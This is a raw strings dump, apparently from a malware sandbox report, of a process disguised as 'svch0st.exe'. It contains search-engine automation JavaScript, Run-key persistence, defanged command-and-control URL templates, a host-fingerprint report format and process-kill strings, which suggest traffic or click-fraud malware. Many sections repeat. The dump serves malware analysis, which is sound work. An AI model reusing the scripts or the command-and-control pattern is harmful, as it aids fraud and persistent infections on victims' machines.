function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_3196_rwx_00081000_00110000:

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

svch0st.exe_3196_rwx_00193000_00001000:

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHELL32.dll

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

RegCloseKey

CertOpenStore

SHDeleteKeyW

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_3196_rwx_69551000_00001000:

d3d10d.dll

id3d10ref.dll

d3d10core.dll

d3d10warp.dll

The application was compiled against and will only work with D3D10_SDK_VERSION (%d), but the currently installed runtime is version (%d).

.XiJ-Xi

#pragma ruledisable 0xx

#pragma warning (disable:%d)

#pragma warning (error:%d)

#pragma warning (once:%d)

#pragma def (%s, %s, %g, %g, %g, %g)

D3D10PreprocessShader

duplicate attribute %s

unknown attribute %s, or attribute invalid for this statement

internal error: argument missing context (A%u)

?internal error: operand type mismatch

invalid register specification, expected '%c' binding

user defined %s buffers cannot be target specific

Duplicated input semantics can't change type, size, or layout ('%s').

array dimension for %s must be %i

register or offset bind %s.%s not valid

Cannot map loop to shader target, target does not support breaks

Loop only executes for %d iteration(s), forcing loop to unroll

Unable to unroll loop, loop does not appear to terminate in a timely manner (%d iteratio

svch0st.exe_3196_rwx_69751000_00001000:

(Bv.SCv=kAv

JSCRIPT9.dll

svch0st.exe_3196_rwx_69911000_00001000:

Bv.SCv

BvsuAv.TBv(JBv

.wcg-w

svch0st.exe_3196_rwx_6B1EB000_00001000:

Fv=kAv.SCv

svch0st.exe_3196_rwx_6D351000_00001000:

>mInvalid parameter passed to C runtime function.

svch0st.exe_3196_rwx_6DA01000_00001000:

'i' is only supported with debug builds.

*** %s%ls%sSource: `%ls:%ld`

vsStageData.Color = Diffuse;

vsStageData.UV = UV;

float2 inputUV = vsStageData.UV;

vsStageData.UV.x = inputUV.x*mat3x2TextureTransform0[0]   inputUV.y*mat3x2TextureTransform0[1]   mat3x2TextureTransform0[2];

vsStageData.UV.y = inputUV.x*mat3x2TextureTransform1[0]   inputUV.y*mat3x2TextureTransform1[1]   mat3x2TextureTransform1[2];

vsStageData.Color = Color;

BlendColor = vsStageData.Color;

Diffuse = vsStageData.Color;

uv = vsStageData.UV;

halfTexelSizeNormalized_and_vCoord = Data_halfTexelSizeNormalized_and_vCoord;

halfTexelSizeNormalized_and_vCoord_and_gradientSpanNormalized = Data_halfTexelSizeNormalized_and_vCoord_and_gradientSpanNormalized;

gradOrigin_and_firstTexelRegionCenter = Data_gradOrigin_and_firstTexelRegionCenter;

USERProcessHandleQuota

GDIProcessHandleQuota

kernel32.dll

Software\Microsoft\Avalon.Graphics

d:\win7sp1_gdr\windows\wgi\shared\util\utillib\debugbreak.cpp

svch0st.exe_3196_rwx_6DFC1000_00002000:

.wb\-w

.wH2-w

.wq -w;

Bv.TBv2

D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW)

Prop%d

FEATURE_URLFILE_CACHEFLUSH_KB936881

svch0st.exe_3196_rwx_6E951000_00001000:

zFw.AEw

CLSID\%s\InProcServer32

VID_X&PID_X

%s\%s

Joystick%dOEMName

GAMEPORT\VID_045E&PID_010C

GAMEPORT\VID_045E&PID_010B

GAMEPORT\VID_045E&PID_010A

GAMEPORT\VID_045E&PID_0109

GAMEPORT\VID_045E&PID_0108

GAMEPORT\VID_045E&PID_0107

GAMEPORT\VID_045E&PID_0106

GAMEPORT\VID_045E&PID_0105

GAMEPORT\VID_045E&PID_0104

GAMEPORT\VID_045E&PID_0103

GAMEPORT\VID_045E&PID_0102

JoystickßFConfiguration

JoystickÜonfiguration

svch0st.exe_3196_rwx_6E981000_00001000:

d:\w7rtm\base\diagnosis\pdi\pdh\pdhdll\query.c

d:\w7rtm\base\diagnosis\pdi\pdh\pdhlog\log.c

SOFTWARE\Microsoft\Windows NT\CurrentVersion\PDH

svch0st.exe_2632:

`.rsrc

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

.MD{#

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

